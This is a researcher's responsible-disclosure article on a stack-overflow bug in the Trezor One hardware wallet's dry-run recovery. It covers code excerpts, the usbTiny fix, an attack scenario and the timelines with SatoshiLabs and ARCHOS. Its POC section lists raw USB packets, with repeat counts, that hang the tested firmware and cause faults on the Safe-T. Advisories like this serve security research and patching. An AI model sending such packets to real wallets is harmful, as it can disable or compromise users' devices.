Trezor One dry-run recovery vulnerability

In the first half of 2018, I found a number of security issues in the Trezor One hardware wallet during my master's thesis on fuzzing and verification. Most of the issues were discovered through the powerful combination of fuzzing with libFuzzer and error detection via sanitizers such as Address Sanitizer and Undefined Behavior Sanitizer.

This article is about the stack-overflow vulnerability in the Trezor One BIP39 dry-run recovery functionality that was fixed with the 1.6.2 firmware release in June 2018.

See the next article for the buffer overflow issue I also found during my academic research.

Technical background
The vulnerability
Responsible disclosure

Consulting

I’m a freelance Security Consultant and currently available for new projects. If you are looking for assistance to secure your projects or organization, contact me.

Technical background

The private key at the heart of a cryptocurrency hardware wallet is usually exposed to the owner of the device only once during the initial wallet configuration via a so-called seed phrase which conforms to the BIP39 standard. This ensures that the owner can create an appropriate backup of the key (e.g., on paper or another non-digital medium) and restore it later on a different device. Having a backup in a secure location is particularly useful in case of device malfunction, device loss, migration between products and so on.

Correspondingly, the Trezor One wallet can be initialized directly from a pre-existing BIP39 seed phrase to import the wallet(s) associated with this private key. This procedure is called recovery. Since the host computer cannot be trusted due to potential malware infections, the recommended “advanced recovery” (1) method implemented on the Trezor One is designed to use a special word matrix on the OLED display to reduce the information that can be inferred by the host computer about the entered private key.

To give users the assurance that their copy of the seed phrase is correct and does correspond to the actively used wallet on the device, there is a so-called dry-run recovery variant (1, 2) on the Trezor One which offers a similar BIP39 recovery dialog on a fully-initialized device. This dry-run recovery only performs a comparison of the seed phrases and does not change the device state.

The vulnerability

Once the dry-run recovery procedure is in progress, a number of USB packets containing the user choices corresponding to the scrambled word input selections are sent from the host to the device. Once a complete word is selected, it is highlighted for 250 ms by the following code:

static void recovery_digit(const char digit) {
    // [...]
    if ((word_index % 4) == 3) {
        // [...]

        /* Mark the chosen word for 250 ms */
        int y = 54 - ((digit - '1')/3)*11;
        int x = 64 * (((digit - '1') % 3) > 0);
        oledInvert(x + 1, y, x + 62, y + 9);
        oledRefresh();
        usbSleep(250);
        // [...]
    }
    // [...]
}

recovery.c

As with other lengthy device procedures, the user might decide to abort the dry-run recovery procedure without restarting the device. The host can signal this, for example, with a protobuf message of type MessageType_Cancel encoded in a USB packet.

To allow the abort to happen during the wait period of the word display, the usbSleep function is used. It is the job of usbSleep to detect and parse new USB packets via busy polling during this “sleep” phase:

void usbSleep(uint32_t millis) {
  uint32_t start = timer_ms();

  while ((timer_ms() - start) < millis) {
    if (usbd_dev != NULL) {
      usbd_poll(usbd_dev);
    }
    // [...]
  }
}

usb.c

The flaw in recovery_digit is that the state machine should only allow a few specific USB messages of the so-called tiny message type subset while the recovery is going on, but the corresponding limit flag is not set, and so all types of packets are accepted and processed.

As a result, an attacker can send another USB packet that triggers the exact same code path in recovery_digit again during this 250 ms sleep period. Since this nesting can be repeated recursively, each additional packet adds further call frames until the limited stack on the device overflows, potentially allowing the attacker to hijack the program execution.

Note that this attack does not require a high timing accuracy for the packet transmissions to work.

The fix

To solve the recursion issue, the usbTiny() function was used to limit the type of allowed USB packets during the sleep:

// [...]
oledRefresh();
usbTiny(1);
usbSleep(250);
usbTiny(0);

usb.c

Attack scenario and security implications

Preconditions for the attack:

- The ability to send USB packets to the device
  - e.g., malware on the host with user permissions
- The target device must be in an unlocked state
  - automatically the case if no PIN is configured
  - otherwise: PIN entry by the owner
- (Some versions) Button confirmation by the user
  - accepting the dry-run procedure

Malware on the host computer can wait until the user unlocks the device to perform some “regular” operations. It is important in this context that, on many Trezor One firmware versions, the dry-run recovery requires neither a second PIN entry nor a button confirmation, which makes this issue easier to exploit. The attack itself takes less than two seconds.

Assessing the exact security impact on the different firmware versions is difficult due to individual memory layouts and protection levels. It should be assumed that this vulnerability can be leveraged to change the control flow or get arbitrary code execution on some versions.

Mitigations

The most relevant protections are the stack canary and the MPU configuration of the microcontroller. The exact configurations are different between firmware versions. Newer versions like the Trezor One 1.6.1 have the strongest mitigations in place.

However, as far as I’m aware these mitigations only make successful exploitation significantly harder, but not impossible.

POC

Trezor One

The following sequence of USB packets will cause the device to hang:

# 1x - reset previous actions (optional)
?##\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

# 1x - start the advanced matrix recovery
?##\x00-\x00\x00\x00\x1e\x08\x0c\x10\x00\x18\x00"\x07english*\x05label0\x00@\x01HdP\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

# 1x - acknowledge button request
# only necessary on Trezor One fw. 1.6.1
?##\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

# 3x - send digit decision to confirm the first word and trigger the initial usbSleep() time window
?##\x00/\x00\x00\x00\x03\n\x011\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

# 300x / 309x / 313x - send more digit decision packets to trigger the recursion issue
# the number of necessary packets depends on the firmware version
?##\x00/\x00\x00\x00\x03\n\x011\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

This sequence was tested on firmware versions 1.5.2, 1.6.0 and 1.6.1.

Safe-T

On the newest Safe-T firmware 1.1.3, a similar sequence of packets leads to two different faults.
Note that on this device, user interaction via a button confirmation is necessary.

Memory fault:

Memory fault after launching the USB exploit

Stack smashing fault:

Stack smashing fault after launching the USB exploit

As an interesting detail, in the stack smashing case there are a number of artifacts on the display at 0:05 shortly before the stack smashing is detected. This suggests that this attack can be leveraged to cause more serious impact than a denial of service.

Responsible disclosure

Initial disclosure

I responsibly disclosed the issue to SatoshiLabs through my thesis advisor Dr. Jochen Hoenicke who also suggested the relevant patch. The issue was fixed quickly with a firmware release after ~32 days.

I co-authored the public disclosure article on the issue.

Second disclosure

During the OLED information leak issue in mid-2019, I found that the firmware of the ARCHOS Safe-T hardware wallet also contained the vulnerable code and was not yet fixed after ~12 months of the issue being public. I notified ARCHOS privately and urged them to patch the issue as soon as possible. They confirmed the vulnerability in early July and indicated that they were planning to do a firmware release within two weeks.

In late July, they announced that the beta firmware was ready and that the GitHub repository would be updated soon.

Unfortunately, I have not heard back from ARCHOS as of 2019-12-09 despite multiple attempts to reach them. The last commit to their public GitHub repository was almost a year ago. The newest firmware version 1.1.3 is still vulnerable, as shown in the POC section.

Relevant products

product	source	fixed version	vendor references
SatoshiLabs Trezor One	GitHub	1.6.2	Issue disclosure post, General release notes
Archos Safe-T	GitHub	no public patch in the repository, see (1)	no public report

Detailed timeline

Date	info
2018-05-25	Issue is described to Dr. Hoenicke and disclosed to SatoshiLabs
2018-05-29	Internal patch is available
2018-06-04	Planned release date: 2018-06-13
2018-06-25	Firmware v1.6.2 is released
2018-06-25	Public blog post on the general firmware update
2018-07-12	Public disclosure of the vulnerability via Trezor blog post
~~~~
2019-05-04	First attempt to reach ARCHOS development team
2019-06-28	First response from ARCHOS development team
2019-07-01	Detailed notice to ARCHOS development team about unpatched status of Safe-T
2019-07-01	ARCHOS acknowledges the issue
2019-07-12	ARCHOS reports internal evaluation of the patch
2019-07-25	ARCHOS reports that the firmware fix will be released soon
2019-08-10	Request to ARCHOS for a response
2019-10-14	Request to ARCHOS for a response
2019-11-27	Request to ARCHOS for a response
2019-12-07	Request to ARCHOS for a response

Credit

I would like to credit Dr. Jochen Hoenicke as a co-author of this discovery and thank Dr. Daniel Dietsch for his general assistance and supervision during the thesis.

Bug bounty

SatoshiLabs provided a bug bounty for this issue.
